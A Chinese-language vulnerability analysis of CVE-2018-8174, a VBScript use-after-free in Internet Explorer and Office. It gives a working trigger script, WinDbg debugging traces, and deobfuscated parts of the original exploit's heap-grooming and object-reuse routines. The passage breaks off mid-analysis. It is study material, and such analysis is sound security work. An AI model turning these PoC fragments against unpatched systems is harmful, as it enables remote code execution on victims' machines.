一、漏洞背景
CVE-2018-8174漏洞是360追日安全团队于4份捕获到的,并将其命名为“双杀”漏洞,意指在IE浏览器以及office均可以引发的漏洞。
该漏洞在当时影响最新版本的IE浏览器以及使用了IE内核的应用程序。用户在浏览网页或者打开Office文档的时候都可能中招。
微软在4月20号也确认了此漏洞,并在5月8号发布了官方补丁。本文档将对该漏洞进行详细分析理解,并提交复现过程与防御建议,供大家相互交流学习。
微软针对gai’lou’dong补丁链接 https://www.freebuf.com/wp-admin/a href=
所影响版本:
Microsoft Excel 2010 SP2 Microsoft Excel 2013 SP1 Microsoft Excel 2016 Microsoft Office 2010 SP2 Microsoft Office 2013 RT SP1 Microsoft Office 2013 SP1Microsoft Office 2016 Microsoft Office Compatibility SP3…
该漏洞影响比较广泛,可以在该链接查看详细列表: https://www.securityfocus.com/bid/103998
二、 漏洞原理
2.1.UAF的理解
首先了解一个简单的C 层面的悬垂指针:
代码语言:javascript复制#include "stdafx.h" #include <malloc.h>int main() { char *p1; p1 = (char*)malloc(sizeof(char) * 10); memcpy(p1, "hello", 10); printf("p1,addr:%x,%sn", p1, p1); free(p1); char *p2; p2 = (char*)malloc(sizeof(char) * 10); memcpy(p2, "hello", 10); printf("p2,addr:%x,%sn", p2, p1); printf("p2,addr:%x,%sn", p2, p2); free(p2); return 0; } //输出: //p1,addr:99ac88,hello //p2,addr:99ac88,hello //p2,addr:99ac88,hello在指针p1被释放后,却仍然可以执行已经被释放的内存,而且在 free 了 p1 之后再次申请同样大小空间,操作系统会将刚刚 free 了的内存重新分配。
并且可以通过p2操作p1,那么如果再次使用p1,则可以通过p2修改程序功能等目的。p1就叫做 悬垂指针,UAF会造成内存破坏的原因就是使用了悬垂指针。
理解了上面的悬垂指针后再看在vbs中的悬垂指针是怎样的,根据原始 PoC 防写一个造成悬垂指针的脚本来理解一下:
代码语言:javascript复制<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=10"> </head> <body> <script language="vbscript"> Dim array_a Dim array_b(1) Class Trigger '重载析构函数 Private Sub Class_Terminate() Alert "重载析构函数" Set array_b(0)=array_a(1) '增加了一个array_b(0)对Trigger实例的引用(Trigger实例引用计数 1) '删除array_a (1) 对Trigger实例的引用 'Trigger实例引用计数-1 来平衡引用计数 array_a(1)=1 IsEmpty(array_b) 'IsEmpty 方便断点观察 End Sub End Class Sub UAF Alert "UAF" Alert "重新定义array_a" ReDim array_a(1) Alert "创建Trigger实例给数组array_a" Set array_a(1)=New Trigger IsEmpty(array_a) Alert "清空array_a中的元素,触发Class_Terminate" Erase array_a IsEmpty("Erase Finish") End Sub Sub TriggerVuln Alert "访问未分配的内存,触发漏洞 " array_b(0)=0 End Sub Sub StartExploit UAF TriggerVuln End Sub StartExploit </script> </body> </html>如上:
1,在UAF函数中,Set array_a(1)=New Trigger 是创建了一个 Trigger 实例给数组 array_a, Erase array_a 在析构 array_a 中的元素时,会调用 Trigger 的重载的析构函数;
2,在此函数中先增加了一个 array_b(0) 对 Trigger 实例的引用(Trigger实例引用计数 1),又通过 array_a(1)=1 删除 array_a(1) 对 Trigger 实例的引用,(Trigger的实例引用计数减1)来平衡引用计数后,才会彻底释放 Trigger 实例
3,但是此时 array_b(0) 仍然保留着这个类的引用,然后在 TriggerVuln 函数中,array_b(0)=0 对array_b(0) 进行访问时造成了触发漏洞,此时 array_b(0) 就叫做悬垂指针
2.1.1.调试
在windbg 所在文件夹开启hpa页堆调试 和ust栈回溯选项:
代码语言:javascript复制//启用页面堆--开启hpa页堆调试 和ust堆分配记录 //关于此技术原理的可以看一下这个连接: http://www.cnblogs.com/Ox9A82/p/5603172.html C:TOOLSwindbg_cnWinDbg(x86)>gflags.exe /i iexplore.exe ust hpa//winDbg 附加IE调试后可以捕捉到此崩溃现场 //汇编 .. 76aa4966 8b4608 mov eax,dword ptr [esi 8] 76aa4969 85c0 test eax,eax 76aa496b 0f8454f5ffff je OLEAUT32!VariantClear 0xc3 (76aa3ec5) 76aa4971 8b08 mov ecx,dword ptr [eax] ds:0023:06076fd0=???????? .. //command 0:013> g (e84.548): Access violation - code c0000005 (first chance) //访问已经释放的内存,从而崩溃 First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=06076fd0 ebx=06192fe0 ecx=00000009 edx=00000002 esi=06192fe0 edi=00000009 eip=76aa4971 esp=0457d02c ebp=0457d034 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 OLEAUT32!VariantClear 0xb3: 76aa4971 8b08 mov ecx,dword ptr [eax] ds:0023:06076fd0=???????? 0:005> !heap -p -a eax address 06076fd0 found in _DPH_HEAP_ROOT @ 17e1000 in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize) //对象所在的内存已经被释放 17e3e38: 6076000 2000 728390b2 verifier!AVrfDebugPageHeapFree 0x000000c2 774e65f4 ntdll!RtlDebugFreeHeap 0x0000002f 774aa0aa ntdll!RtlpFreeHeap 0x0000005d 774765a6 ntdll!RtlFreeHeap 0x00000142 76b898cd msvcrt!free 0x000000cd 7141406c vbscript!VBScriptClass::`scalar deleting destructor' 0x00000019 7141411a vbscript!VBScriptClass::Release 0x00000043 //调用类的析构函数,释放了VBSClass对象,也就是脚本中的Trigger实例 76aa4977 OLEAUT32!VariantClear 0x000000b9 6bfce433 IEFRAME!Detour_VariantClear 0x0000002f 76abe325 OLEAUT32!ReleaseResources 0x000000a3 76abdfb3 OLEAUT32!_SafeArrayDestroyData 0x00000048 76ac5d2d OLEAUT32!SafeArrayDestroyData 0x0000000f 76ac5d13 OLEAUT32!Thunk_SafeArrayDestroyData 0x00000039 7145267f vbscript!VbsErase 0x00000057 //call 了vbscript!VbsErase 此函数对应脚本中的`Erase array_a ` 71403854 vbscript!StaticEntryPoint::Call 0x00000011 7140586e vbscript!CScriptRuntime::RunNoEH 0x00001c10 71404ff6 vbscript!CScriptRuntime::Run 0x00000064在VBScriptClass::Release函数中的逻辑:
代码语言:javascript复制VBScriptClass *__stdcall VBScriptClass::Release(VBScriptClass *this) { VBScriptClass *this_1; // ebx@1 volatile LONG *v2; // edi@1 VBScriptClass *result_1; // [sp 14h] [bp 8h]@1 this_1 = this; v2 = (volatile LONG *)((char *)this 4); result_1 = (VBScriptClass *)InterlockedDecrement((volatile LONG *)this 1);// 引用计数 -1,引用计数保存在&VBScriptClass 0x4的位置 if ( !result_1 ) // result为引用计数,为零则进入内存释放 { InterlockedIncrement(v2); VBScriptClass::TerminateClass(this_1); // 脚本重载了类Terminate的析构函数,在重载的函数中又增加了array_b对Object的引用 result_1 = (VBScriptClass *)InterlockedDecrement(v2); if ( !result_1 ) // 当认为当下的Object的引用计数已经为0时,进入系统析构程序 { if ( this_1 ) (*(void (__thiscall **)(VBScriptClass *, signed int))(*(_DWORD *)this_1 0x68))(this_1, 1);// 调用析构函数释放VBScriptClass的内存 } } return result_1; }2.1.2 溯源
代码语言:javascript复制// 在winDbg中这样下断点 bp vbscript!VBScriptClass::TerminateClass ".printf "Class %mu at %x, terminate called\n", poi(@ecx 0x24), @ecx; g"; bp vbscript!VBScriptClass::Release ".printf "Class %mu at: %x ref counter, release called: %d\n", poi(@eax 0x24), @ecx, poi(@eax 0x4); g"; bp vbscript!VBScriptClass::Create 0x55 ".printf "Class %mu created at %x\n", poi(@esi 0x24), @esi; g"; bp vbscript!VbsIsEmpty第一次断点:
代码语言:javascript复制//即可输出VBScriptClass对象名称,对象地址,虚函数表地址,以及引用计数: 0:013> g Class Trigger created at 178afd0 Class Trigger at: 6fb61748 ref counter, release called: 2 Class Trigger at: 6fb61748 ref counter, release called: 2 Class Trigger at: 6fb61748 ref counter, release called: 2 //类对象地址 0:005> ln poi (0178afd0 ) (6fb61748) vbscript!VBScriptClass::`vftable' | (6fb6c518) vbscript!__pfnDefaultDliNotifyHook2 Exact matches: vbscript!VBScriptClass::`vftable' = <no type information> 0:005> dd 0178afd0 0178afd0 6fb61748 00000002 05fd1f78 08477f88 //02是引用计数的值 0178afe0 00000e08 00000000 00000000 05fd5efc 0178aff0 00000000 088d6fe4 00000000 00000000 0:005> du 088d6fe4 //类的名字 088d6fe4 "Trigger" //也可以通过vbscript!VbsIsEmpty断点追溯到类的地址。如下: Breakpoint 3 hit eax=6fb6185c ebx=044bd284 ecx=6fbba9d8 edx=044bd1fc esi=05faf54c edi=00000001 eip=6fb7c206 esp=044bd118 ebp=044bd128 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 vbscript!VbsIsEmpty: 6fb7c206 8bff mov edi,edi 0:005> dd poi(esp c) 05fbbf60 044b004a 77431fd0 0174bfe8 01721020 //0174bfe8是数据结构地址 05fbbf70 c0c00000 c0c0c0c0 c0c0c0c0 c0c0c0c0 05fbbf80 044bd578 05fbbfa0 c0c0c0c0 c0c0c0c0 05fbbf90 c0c00000 c0c0c0c0 c0c0c0c0 c0c0c0c0 05fbbfa0 044bd7bc 05fbbfe0 c0c00001 c0c0c0c0 05fbbfb0 0000400c 00000000 05fc5ec8 00000000 05fbbfc0 0000400c 00000000 05fc5e88 00000000 05fbbfd0 c0c00000 c0c0c0c0 c0c0c0c0 c0c0c0c0 0:005> dd 0174bfe8 l8 0174bfe8 044b200c 77431fd0 0833efe8 01721020//200c这两个字节表示的是VBScript变量类型,表示的是SAFEARRAY类型,ARRAY在07f4dfe8存放 0174bff8 00000000 c0c0c0c0 ???????? ???????? 0:005> dt ole32!safearray 0833efe8 //解析safearray结构,pvdata表示数据地址 0x000 cDims : 1 //cDims表示维数 0x002 fFeatures : 0x880 0x004 cbElements : 0x10 0x008 cLocks : 0 0x00c pvData : 0x08346fe0 Void //array_a数据元素地址 0x010 rgsabound : [1] tagSAFEARRAYBOUND 0:005> dd 0x08346fe0 08346fe0 00000000 00000000 00000000 00000000 //array_a(0)没有定义 08346ff0 c0c00009 c0c0c0c0 0178afd0 c0c0c0c0 //array_a(1)type==0x9表示是一个object,值为0178afd0 08347000 ???????? ???????? ???????? ???????? //即找到类对象的地址,也就是说array_a(1)已经指向了Trigger对象 0:005> dd 0178afd0 0178afd0 6fb61748 00000002 05fd1f78 08477f88 0178afe0 00000e08 00000000 00000000 05fd5efc 0178aff0 00000000 088d6fe4 00000000 00000000 0178b000 ???????? ???????? ???????? ???????? 0:005> du 088d6fe4 088d6fe4 "Trigger"第二次断点:
执行到第二个 ISEmpty ,即析构函数中的ISEmpty的时候(在Erase array_a的时候,会触发Class_Terminate析构函数),此时Set array_b(0)=array_a(1)已执行;则:
代码语言:javascript复制Breakpoint 3 hit eax=6fb6185c ebx=044bcf48 ecx=6fbba9d8 edx=044bcec0 esi=05faf54c edi=00000001 eip=6fb7c206 esp=044bcddc ebp=044bcdec iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 vbscript!VbsIsEmpty: 6fb7c206 8bff mov edi,edi 0:005> dd poi(esp c) 05fbbf30 c0c0600c c0c0c0c0 05fc5ed4 082a4fe8 //data buffer 在082a4fe8 05fbbf40 c0c00000 c0c0c0c0 0178afd0 c0c0c0c0 05fbbf50 044bd334 05fbbf80 c0c00001 c0c0c0c0 05fbbf60 044b400c 77431fd0 05fc5e88 01721020 05fbbf70 c0c00000 c0c0c0c0 c0c0c0c0 c0c0c0c0 05fbbf80 044bd578 05fbbfa0 c0c0c0c0 c0c0c0c0 05fbbf90 c0c00000 c0c0c0c0 c0c0c0c0 c0c0c0c0 05fbbfa0 044bd7bc 05fbbfe0 c0c00001 c0c0c0c0 0:005> dd 082a4fe8 //safearray结构 082a4fe8 08920001 00000010 00000000 012edfe0 082a4ff8 00000002 00000000 ???????? ???????? 082a5008 ???????? ???????? ???????? ???????? 0:005> dt ole32!safearray 082a4fe8 0x000 cDims : 1 0x002 fFeatures : 0x892 0x004 cbElements : 0x10 0x008 cLocks : 0 0x00c pvData : 0x012edfe0 Void //array_b数据元素地址 0x010 rgsabound : [1] tagSAFEARRAYBOUND 0:005> dd 0x012edfe0 lc 012edfe0 c0c00009 c0c0c0c0 0178afd0 c0c0c0c0 //类型还是0x09,array_b(0)中此时保存着类对象地址 012edff0 00000000 00000000 00000000 00000000 012ee000 ???????? ???????? ???????? ???????? 0:005> ln poi(0178afd0 ) //类对象地址 0178afd0 (6fb61748) vbscript!VBScriptClass::`vftable' | (6fb6c518) vbscript!__pfnDefaultDliNotifyHook2 Exact matches: vbscript!VBScriptClass::`vftable' = <no type information> 0:005> dd 0178afd0 0178afd0 6fb61748 00000004 05fd1f78 08477f88 0178afe0 00000e08 00000000 00000000 05fd5efc 0178aff0 00000001 088d6fe4 00000000 00000000 0178b000 ???????? ???????? ???????? ???????? 0:005> du 088d6fe4 //类名称 088d6fe4 "Trigger"第三次断点:此时 Erase已经执行完毕:
代码语言:javascript复制Breakpoint 3 hit eax=6fb6185c ebx=044bd284 ecx=6fbba9d8 edx=044bd1fc esi=05faf54c edi=00000001 eip=6fb7c206 esp=044bd118 ebp=044bd128 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 vbscript!VbsIsEmpty: 6fb7c206 8bff mov edi,edi //此时查看object的地址为空, 0:005> dd 0178afd0 0178afd0 ???????? ???????? ???????? ???????? 0178afe0 ???????? ???????? ???????? ???????? 0178aff0 ???????? ???????? ???????? ???????? 0:005> !heap -p -a 0178afd0 address 0178afd0 found in _DPH_HEAP_ROOT @ 1721000 //in free-ed allocation 表示已经被释放 in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize) 1722e38: 178a000 2000 733390b2 verifier!AVrfDebugPageHeapFree 0x000000c2 774e65f4 ntdll!RtlDebugFreeHeap 0x0000002f 774aa0aa ntdll!RtlpFreeHeap 0x0000005d 774765a6 ntdll!RtlFreeHeap 0x00000142 .. .. //此时分别查看array_b与array_a 的情况: //array_b(0)的情况: 0:005> dd 0x012edfe0 012edfe0 c0c00009 c0c0c0c0 0178afd0 c0c0c0c0 //array_b(0)依然保存着类对象地址,但是类对象已经被释放了 012edff0 00000000 00000000 00000000 00000000 012ee000 ???????? ???????? ???????? ???????? 012ee010 ???????? ???????? ???????? ???????? //array_a的情况: 0:005> dd 0x08346fe0 08346fe0 ???????? ???????? ???????? ???????? //array_a已经被释放 08346ff0 ???????? ???????? ???????? ???????? 08347000 ???????? ???????? ???????? ????????显然有些地方出现了错误,明明 array_b 还保留着对Trigger Object引用的时候,Trigger Object却随着 Erase array_a被释放了。我们来看看错误的地方:
2.2 验证
在IDA里面查看过 VBScriptClass::Release 的伪代码,以及上面的调试后,我们猜测在脚本中的重载的析构函数中,Set array_b(0)=array_a(1)这句是否有对 Class Trigger 的引用计数进行操作,
接下来进行验证,在以下位置下断点:
代码语言:javascript复制bu vbscript!VbsErase bu vbscript!VBScriptClass::Release bu vbscript!VbsIsEmpty bp vbscript!VBScriptClass::Create 0x55 ".printf "Class %mu created at %x\n", poi(@esi 0x24), @esi; g";前面的几次 Release 不用看,一直到VbsErase后面的release的时候单步调试
(此时在调试日志中,类对象地址已经被bp vbscript!VBScriptClass::Create 0x55 “.printf ”Class %mu created at %xn”, poi(@esi 0x24), @esi; g”; 打印出来了,或者运行到 release 的时候的esp 8也是类对象地址)
代码语言:javascript复制0:005> g Class Trigger created at 189bfd0 .. .. Breakpoint 1 hit eax=0189bfd0 ebx=00000020 ecx=6d9a1748 edx=00000000 esi=087efff0 edi=00000009 eip=6d9b1ef3 esp=0468c9cc ebp=0468c9dc iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 vbscript!VBScriptClass::Release: 6d9b1ef3 8bff mov edi,edi 0:005> dd 189bfd0 0189bfd0 6d9a1748 00000001 06103f78 08657f88 //此时的引用计数为1 0189bfe0 00000d80 00000000 00000000 06107efc 0189bff0 00000000 071e4fe4 00000000 00000000 0189c000 ???????? ???????? ???????? ???????? 单步调试到: 6d9b1efc 56 push esi 6d9b1efd 8b35e4129a6d mov esi,dword ptr [vbscript!_imp__InterlockedDecrement (6d9a12e4)] 6d9b1f03 57 push edi 6d9b1f04 8d7b04 lea edi,[ebx 4] 6d9b1f07 57 push edi //edi 中保存的便是object的引用计数 6d9b1f08 ffd6 call esi {kernel32!InterlockedDecrementStub (775bbbf0)} 6d9b1f0a 894508 mov dword ptr [ebp 8],eax 6d9b1f0d 85c0 test eax,eax //如果此时的引用计数为0, 6d9b1f0f 0f84d8210000 je vbscript!VBScriptClass::Release 0x1e (6d9b40ed)//则进入Release 0x1e,调用析构函数 6d9b1f15 8b4508 mov eax,dword ptr [ebp 8] //此时的edi 的值为1,然后调用InterlockedDecrementStub 把引用计数减一 0:005> dd edi 0189bfd4 00000001 06103f78 08657f88 00000d80 //继续调试,这里就执行 我们代码中 的Set array_b(0)=array_a(1)这句了 6da140f4 8bcb mov ecx,ebx 6da140f6 e829000000 call vbscript!VBScriptClass::TerminateClass (6da14124) 6da140fb 57 push edi 6da140fc ffd6 call esi 6da140fe 894508 mov dword ptr [ebp 8],eax 6da14101 85c0 test eax,eax 6da14103 0f850cdeffff jne vbscript!VBScriptClass::Release 0x43 (6da11f15) 6da14109 85db test ebx,ebx 6da1410b 0f8404deffff je vbscript!VBScriptClass::Release 0x43 (6da11f15) 6da14111 8b03 mov eax,dword ptr [ebx] 6da14113 6a01 push 1 6da14115 8bcb mov ecx,ebx 6da14117 ff5068 call dword ptr [eax 68h] ds:0023:6da017b0={vbscript!VBScriptClass::`vector deleting destructor' (6da14053)} //最终因为引用计数为0,调用vector deleting destructo,释放对象内存 0:005> p eax=00000001 ebx=01882fd0 ecx=01882fd0 edx=00000000 esi=775bbbf0 edi=01882fd4 eip=6da140f6 esp=045ccd8c ebp=045ccd98 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 vbscript!VBScriptClass::Release 0x27: 6da140f6 e829000000 call vbscript!VBScriptClass::TerminateClass (6da14124) 0:005> dd 1882fd0 01882fd0 6da01748 00000001 05f31f78 08469f88 //在进入TerminateClass前引用计数为1 01882fe0 0000098c 00000000 00000000 05f35efc 01882ff0 00000000 087e4fe4 00000000 00000000 01883000 ???????? ???????? ???????? ???????? 0:005> p eax=00000000 ebx=01882fd0 ecx=01882fd4 edx=0008001f esi=775bbbf0 edi=01882fd4 eip=6da140fb esp=045ccd8c ebp=045ccd98 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 vbscript!VBScriptClass::Release 0x2c: 6da140fb 57 push edi 0:005> dd 1882fd0 01882fd0 6da01748 00000001 05f31f78 08469f88 //在执行TerminateClass后引用计数仍然为1, 01882fe0 0000098c 00000000 00000000 05f35efc 01882ff0 00000001 087e4fe4 00000000 00000000 01883000 ???????? ???????? ???????? ???????? //所以问题就在这里,它没有因为Set array_b(0)=array_a(1),而增加类对象的引用计数,造成了在类对象被释放后array_b(0)仍然指向那个类对象地址,而造成了悬垂指针漏洞原因总结:
此漏洞就是存在于release 函数中,如果在自定义的脚本中重载了析构函数,在这个函数中操作了类的引用计数(UAF),而release函数不能正确的判断类的引用计数造成而去析构了这个类,但是仍然指向这个类的指针就变成了悬垂指针,后面通过这个悬垂指针进行一些操作来达到任意读写的目的。
接下来我们调试原始PoC看它是怎么对这个悬垂指针进行利用的,需要对vbs的基本的 数据结构 )有所了解:
0x200C,即VT_VARIANT|VT_ARRAY
Constant | Value | Description |
|---|---|---|
vbEmpty | 0 | Empty (uninitialized) |
vbNull | 1 | Null (no valid data) |
vbInteger | 2 | Integer |
vbLong | 3 | Long integer |
vbSingle | 4 | Single-precision floating-point number |
vbDouble | 5 | Double-precision floating-point number |
vbCurrency | 6 | Currency |
vbDate | 7 | Date |
vbString | 8 | String |
vbObject | 9 | Automation object |
vbError | 10 | Error |
vbBoolean | 11 | Boolean |
vbVariant | 12 | Variant (used only with arrays of Variants) |
vbDataObject | 13 | A data-access object |
vbByte | 17 | Byte |
vbArray | 8192 | Array |
三、 原PoC剥茧抽丝
理解了上面的基础之后我们开始调试原始PoC
原始PoC 在变量名和数据计算中存在大量的混淆,对重要位置进行还原: (以及加入了一些IsEmpty后方便查看参数)
3.1 PoC中的UAF
先分析一下原始poc中的UAF函数:
代码语言:javascript复制Sub UAF Alert "UAF" For i=0 To 19 Set array(i)=New Foo '占据系统堆碎片 Next For i=20 To 39 Set array(i)=New MyClass2 '占据系统堆碎片 Next '-------------------------------------------------------------------------- For i=0 To 6 ReDim array_a(1) Set array_a(1)=New Trigger Erase array_a 'array_b保存了对已经释放的Trigger obj的引用 Next IsEmpty(array_b) Set MyClass2_obj1=New MyClass2 '同时MyClass2_obj2对它占位 IsEmpty(MyClass2_obj1) '-------------------------------------------------------------------------- spec_int_2=0 For i=0 To 6 ReDim array_a(1) Set array_a(1)=New cla2 'array_c保存了对已经释放的 cla2 obj 的引用 Erase array_a Next IsEmpty(array_c) Set MyClass2_obj2=New MyClass2 '同时MyClass2_obj2对它占位 IsEmpty(MyClass2_obj2) End Sub//断点: 0:005> bl 0 e 710b4124 0001 (0001) 0:**** vbscript!VBScriptClass::TerminateClass ".printf "Class %mu at %x, terminate called\n", poi(@ecx 0x24), @ecx; g" 2 e 710b463d 0001 (0001) 0:**** vbscript!VBScriptClass::Create 0x63 ".printf "Class %mu created at %x\n", poi(@esi 0x24), @esi; g" 3 e 710bc206 0001 (0001) 0:**** vbscript!VbsIsEmpty第一次IsEmpty断点,参数为array_b:
代码语言:javascript复制//参数传入的array_b,进入函数后栈空间可以查看 Breakpoint 3 hit eax=6ab1185c ebx=0289cb64 ecx=6ab6a9d8 edx=0289cadc esi=0104783c edi=00000001 eip=6ab2c206 esp=0289c9f8 ebp=0289ca08 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 vbscript!VbsIsEmpty: 6ab2c206 8bff mov edi,edi 0:006> dd poi(esp C) 0049f1a0 0000600c 00000000 01051100 0034c4c8 //0034c4c8 是array_b 的data buffer 0049f1b0 02890002 0049ffc0 01050013 0289c9c0 0049f1c0 02890002 0049ffc0 01050001 0289c9c0 0049f1d0 6ab10002 0289c9fc 02890027 0049ffc0 0049f1e0 6ab10002 0289c9fc 02890001 0049ffc0 0049f1f0 6ab10002 0289c9fc 02890006 0049ffc0 0049f200 6ab10002 0289c9fc 02890001 0049ffc0 0049f210 00000000 00000000 00000000 00000000 0:006> dt ole32!safearray 0034c4c8 0x000 cDims : 1 0x002 fFeatures : 0x892 0x004 cbElements : 0x10 0x008 cLocks : 0 0x00c pvData : 0x00371a68 Void //array_b数据元素地址 0x010 rgsabound : [1] tagSAFEARRAYBOUND 0:006> dd 00371a68 00371a68 01030009 00000000 010526e0 00000000 //010526e0类对象地址 00371a78 6ab10009 010526e4 010526e0 6ab14211 00371a88 6ab10009 010526e4 010526e0 6ab14211 00371a98 6ab10009 010526e4 010526e0 6ab14211 00371aa8 6ab10009 010526e4 010526e0 6ab14211 00371ab8 6ab10009 010526e4 010526e0 6ab14211 00371ac8 6ab10009 010526e4 010526e0 6ab14211 00371ad8 5e2b1c44 88000000 0030007b 0030002e 0:006> dd 010526e0 010526e0 6ab100c6 00000000 00000000 00000000 //引用计数已经为0 010526f0 00000808 00000000 00000000 0103799c 01052700 00000001 003af554 00000000 00000000 01052710 5e163a1d 80000000 000000cd 00000000 0:006> du 003af554 003af554 "Trigger"第二次IsEmpty断点,此时 cla4_obj1 占位已经完成:
代码语言:javascript复制//仍然查看10526e0类对象地址 Class cla4 created at 10526e0 Breakpoint 3 hit eax=6ab1185c ebx=0289cb64 ecx=6ab6a9d8 edx=0289cadc esi=0104783c edi=00000001 eip=6ab2c206 esp=0289c9f8 ebp=0289ca08 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 vbscript!VbsIsEmpty: 6ab2c206 8bff mov edi,edi 0:006> dd 010526e0 010526e0 6ab11748 00000002 010345e0 0049e910 //引用计数变为0x02 010526f0 00000808 00000000 00000000 00000000 01052700 00000000 003af554 00000000 010526a8 01052710 5e163a1d 80000000 000000cd 00000000 01052720 00000000 00000000 00000000 00000000 01052730 00000000 00000000 00000000 00000000 01052740 00000000 00000000 5e163a16 80000000 01052750 000000d4 00000000 00000000 00000000 0:006> du 003af554 003af554 "cla4" //同样的地址cla4_obj1已经占位第三次IsEmpty断点,参数为array_c:
代码语言:javascript复制Breakpoint 3 hit eax=6ab1185c ebx=0289cb64 ecx=6ab6a9d8 edx=0289cadc esi=0104783c edi=00000001 eip=6ab2c206 esp=0289c9f8 ebp=0289ca08 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 vbscript!VbsIsEmpty: 6ab2c206 8bff mov edi,edi 0:006> dd poi(esp C) 0049f1a0 0000600c 00000000 01051140 00375bc0 //00340308是array_c的data buffer 0049f1b0 02890002 0049ffc0 01050013 0289c9c0 0049f1c0 02890002 0049ffc0 01050001 0289c9c0 0049f1d0 6ab10002 0289c9fc 02890027 0049ffc0 0049f1e0 6ab10002 0289c9fc 02890001 0049ffc0 0049f1f0 6ab10002 0289c9fc 02890006 0049ffc0 0049f200 6ab10002 0289c9fc 02890001 0049ffc0 0049f210 6ab10002 0289c9fc 02890006 0049ffc0 0:006> dt ole32!safearray 00375bc0 0x000 cDims : 1 0x002 fFeatures : 0x892 0x004 cbElements : 0x10 0x008 cLocks : 0 0x00c pvData : 0x00371888 Void //array_c数据元素地址 0x010 rgsabound : [1] tagSAFEARRAYBOUND 0:006> dd 0x00371888 00371888 6ab10009 010526e4 01052718 6ab14211 //023b1f98类对象地址 00371898 6ab10009 0105271c 01052718 6ab14211 003718a8 6ab10009 0105271c 01052718 6ab14211 003718b8 6ab10009 0105271c 01052718 6ab14211 003718c8 6ab10009 0105271c 01052718 6ab14211 003718d8 6ab10009 0105271c 01052718 6ab14211 003718e8 6ab10009 0105271c 01052718 6ab14211 003718f8 5e2b1c00 8e000000 00690066 0065006c 0:006> dd 01052718 01052718 6ab100cd 00000000 00000000 00000000 //引用计数已经为0 01052728 00000808 00000000 00000000 01037bcc 01052738 00000001 00370d34 00000000 00000000 01052748 5e163a16 80000000 000000d4 00000000 01052758 00000000 00000000 00000000 00000000 01052768 00000000 00000000 00000000 00000000 01052778 00000000 00000000 5e163a0f 80000000 01052788 000000db 00000000 00000000 00000000 0:006> du 00370d34 00370d34 "cla2"第四次IsEmpty断点,此时 MyClass2_obj2 占位已经完成:
代码语言:javascript复制//仍然查看 1052718 类对象地址 Class cla4 created at 1052718 Breakpoint 3 hit eax=6ab1185c ebx=0289cb64 ecx=6ab6a9d8 edx=0289cadc esi=0104783c edi=00000001 eip=6ab2c206 esp=0289c9f8 ebp=0289ca08 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 vbscript!VbsIsEmpty: 6ab2c206 8bff mov edi,edi 0:006> dd 01052718 01052718 6ab11748 00000002 01034700 0049e910 //引用计数变为0x02 01052728 00000808 00000000 00000000 00000000 01052738 00000000 00370d34 00000000 010526e0 01052748 5e163a16 80000000 000000d4 00000000 01052758 00000000 00000000 00000000 00000000 01052768 00000000 00000000 00000000 00000000 01052778 00000000 00000000 5e163a0f 80000000 01052788 000000db 00000000 00000000 00000000 0:006> du 00370d34 //同样的地址cla4_obj2已经占位 00370d34 "cla4"以上为poc中的UAF函数的作用与原理,接下来看 InitObjects
3.2.PoC中的InitObjects
同样的我们在代码里面加入IsEmpty来便于调试
代码语言:javascript复制Sub InitObjects IsEmpty(MyClass2_obj1) MyClass2_obj1.SetProp(cla6_obj1) '调用了两次 MyClass2_obj1的SetProp函数,分别传入的参数为 cla6_obj1 IsEmpty(MyClass2_obj1) IsEmpty(MyClass2_obj2) MyClass2_obj2.SetProp(cla7_obj1) '参数为cla7_obj1 IsEmpty(MyClass2_obj2) spec_int_1=MyClass2_obj2.mem End Sub Class MyClass2 Dim mem Function P End Function Function SetProp(Value) 'IsEmpty("Enter MyClass2:SetPro") mem=0 mem=Value '分别会调用cla6与cla7的Get P SetProp=0 End Function End Class Class cla6 Public Default Property Get P 'IsEmpty("cal6:call Get P") Dim cla5_obj1 P=174088534690791e-324 For i=0 To 6 array_b(i)=0 Next 'IsEmpty("finish set array_b to 0") Set cla5_obj1=New cla5 cla5_obj1.mem=str_1 'IsEmpty(cla5_obj1) For i=0 To 6 Set array_b(i)=cla5_obj1 Next End Property End Class Class cla7 Public Default Property Get P Dim cla5_obj1 P=636598737289582e-328 For i=0 To 6 array_c(i)= 0 Next 'IsEmpty("finish set array_c to 0") Set cla5_obj1=New cla5 cla5_obj1.mem=str_2 'IsEmpty(cla5_obj1) For i= 0 To 6 Set array_c(i)=cla5_obj1 Next End Property End Class执行前:
代码语言:javascript复制//查看cla4_obj1的地址 0:006> dd 010526e0 010526e0 6ab11748 00000002 010345e0 0049e910 //cla4_obj1.mem的地址 010526f0 00000808 00000000 00000000 00000000 01052700 00000000 003af554 01052718 010526a8 01052710 5e163a1d 88000000 6ab11748 00000001 01052720 01034700 0049e910 00000808 00000000 01052730 00000000 00000000 00000000 00370d34 01052740 00000000 010526e0 5e163a16 80000000 01052750 000000d4 00010a41 00000000 00000000 0:006> du 003af554 003af554 "cla4"执行到cla4_obj1.SetProp(cla6_obj1)这里的时候,去调用cla4的SetProp函数
